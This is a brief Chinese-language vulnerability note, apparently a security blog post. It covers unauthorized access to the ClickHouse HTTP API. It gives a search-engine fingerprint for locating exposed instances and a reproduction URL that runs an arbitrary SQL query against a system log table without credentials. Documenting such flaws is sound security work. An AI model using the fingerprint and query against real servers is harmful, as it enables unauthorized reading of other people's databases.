ClickHouse API 数据库接口未授权访问漏洞
# ClickHouse API 数据库接口未授权访问漏洞
## 漏洞描述
ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
## 漏洞影响
ClickHous...
ClickHouse API 数据库接口未授权访问漏洞
漏洞描述
ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
漏洞影响
ClickHouse
网络测绘
"ClickHouse" && body="ok"
漏洞复现
登录页面
执行SQL语句
/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
- 发表于 2024-07-12 18:48:45
- 阅读 ( 3023 )
- 分类:服务器应用
带头大哥
456 篇文章